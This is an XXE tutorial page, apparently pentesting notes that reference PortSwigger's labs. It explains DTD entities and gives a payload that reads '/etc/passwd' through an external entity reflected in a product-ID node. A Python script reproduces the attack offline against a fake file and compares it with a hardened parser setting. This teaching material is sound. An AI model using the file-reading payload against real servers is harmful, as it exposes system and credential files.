# XXE

## <mark style="color:yellow;">Basics of XML</mark>

Extensible Markup Language (XML) is a markup language designed to store and transport structured data, much like JSON. Unlike JSON, an XML document can carry a Document Type Definition (DTD) that the parser processes before the data itself, and that is where XXE comes from.

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2F1NgRU7inX4XRcWUQcEmS%2Fimage.png?alt=media&#x26;token=9356cb6c-b76f-4147-9ad3-bbf64955f774" alt=""><figcaption><p>The basic structure of XML</p></figcaption></figure>

If you ever see this line at the top of a request body in Burp, you should test for XXE:

* `<?xml version="1.0" encoding="UTF-8"?>`

A Document Type Definition (DTD) defines the structure and the legal elements and attributes of an XML document. It can also declare entities:

* Here an internal ENTITY acts as a variable called “user” that holds the text “Ghostlulz”; writing `&user;` anywhere in the document body is replaced by that text when the document is parsed.

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2F3vveBA02aiaX2qTQxEQM%2Fimage.png?alt=media&#x26;token=a812ae2b-491c-468f-b74d-ba7ba101b099" alt=""><figcaption><p>Document Type Definition</p></figcaption></figure>

Note that an external entity (declared with the `SYSTEM` keyword) loads its value from an external source, which the parser fetches when it expands the entity. Both URLs and local file paths are allowed, for example:

* `<!DOCTYPE foo [<!ENTITY ext SYSTEM "http://example.com">]>`
* `<!DOCTYPE foo [<!ENTITY ext SYSTEM "file:///path/to/file">]>`

## <mark style="color:yellow;">XXE</mark>

Whenever you see XML you should test for XXE.

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2F7sNEQrVR6VPdcQqy0Ryk%2Fimage.png?alt=media&#x26;token=043ef17d-e7df-4c23-ab5a-c1ade9bc7cec" alt=""><figcaption></figcaption></figure>

In order to read the data, the value of the entity must end up somewhere in the response, so the target node has to be one the application reflects back. So:

* if we can use an external entity to grab data from a file on disk and store it in a variable, we can read the “/etc/passwd” file into that variable and reference the variable in a node whose value is returned to us.

#### Testing for XXE

1. Declare your malicious external entity in a DOCTYPE and replace a node value with a reference to it (try each reflected node in turn), like:

* Here we created an external entity that grabs the data in the “/etc/passwd” file, stored it in the entity `xxe`, then placed the reference `&xxe;` in the "\<productId>" node.

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2Fp3U8FB892d5Tix1Dajyb%2Fimage.png?alt=media&#x26;token=72ecfd9a-c6b8-454b-a628-a2a2d6a2382d" alt=""><figcaption><p>XXE payload</p></figcaption></figure>

2. If the parser resolves external entities, the file contents are expanded into the node and reflected back to you in the response, like:

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2F5TwQTQCPy4Qfgfoy6HI3%2Fimage.png?alt=media&#x26;token=130b29e4-93da-4a9b-9d5d-f57939210930" alt=""><figcaption><p>Use XXE to read /etc/passwd file</p></figcaption></figure>
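The two halves of this page (how the parser expands an external entity declared in the DTD, and the stock-check test above) can be reproduced end to end without a target. The script below is an added example, not code from the page or from PortSwigger's lab: it builds the same `<stockCheck>` payload, feeds it to Python's standard-library `xml.sax` parser with external general entities switched on (the vulnerable configuration) and with the default setting (hardened), and returns what the application would put into `productId` in each case. The "/etc/passwd" stand-in is a constructed temporary file, so nothing sensitive is read and the example runs offline; the element names and the file contents are assumptions.

```python
"""Added example: XXE-vulnerable parser configuration next to the hardened one.

Not code from the page or from PortSwigger. Uses only the standard library:
xml.sax's expat backend fetches external general entities only when the
feature_external_ges flag is enabled (off by default since Python 3.7.1).
"""
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for /etc/passwd (assumption: we never touch the real file).
FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)


def build_payload(file_uri: str) -> bytes:
    """Build the page's payload: an external entity 'xxe' pointing at a file: URI,
    referenced inside the <productId> node that the application reflects."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{file_uri}">]>\n'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>\n"
    ).encode()


class ProductIdCollector(ContentHandler):
    """Collects the text of <productId>, the node the application echoes back."""

    def __init__(self):
        super().__init__()
        self._in_product_id = False
        self.product_id = ""

    def startElement(self, name, attrs):
        self._in_product_id = name == "productId"

    def endElement(self, name):
        if name == "productId":
            self._in_product_id = False

    def characters(self, content):
        # Text from an expanded external entity arrives through this same callback.
        if self._in_product_id:
            self.product_id += content


def parse_stock_check(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse the request and return the productId text the server would use.

    resolve_external=True reproduces the vulnerable configuration: external
    general entities are fetched and inlined. False is the safe default,
    which leaves the entity unexpanded (empty) instead of reading the file.
    """
    handler = ProductIdCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    parser.setContentHandler(handler)
    source = xml.sax.InputSource()
    source.setByteStream(io.BytesIO(xml_bytes))
    parser.parse(source)
    return handler.product_id


def demo() -> tuple:
    """Run the payload through both configurations; return (vulnerable, hardened)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as tmp:
        tmp.write(FAKE_PASSWD)
        path = tmp.name
    try:
        payload = build_payload(Path(path).as_uri())
        leaked = parse_stock_check(payload, resolve_external=True)
        safe = parse_stock_check(payload, resolve_external=False)
    finally:
        os.unlink(path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned:\n" + leaked)
    print("hardened parser returned: %r" % safe)
```

The check a reviewer wants from this is the second value: a parser that is safe against this payload hands the application an empty `productId` (or raises), never the file. Whatever XML library the target uses, the equivalent setting (external general entity resolution, and for DTD-aware parsers DTD loading altogether) should be off, and the first value above is what it costs when it is not.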

The vulnerable application used can be found at [**https://portswigger.net/web-security**](https://portswigger.net/web-security)
